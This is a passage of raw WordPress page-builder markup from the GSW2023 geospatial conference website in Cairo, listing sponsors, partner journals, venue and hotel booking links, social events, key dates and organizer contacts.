src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://geomatex.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/32596kmnqz.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><a href=\"https://gsw2023.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" 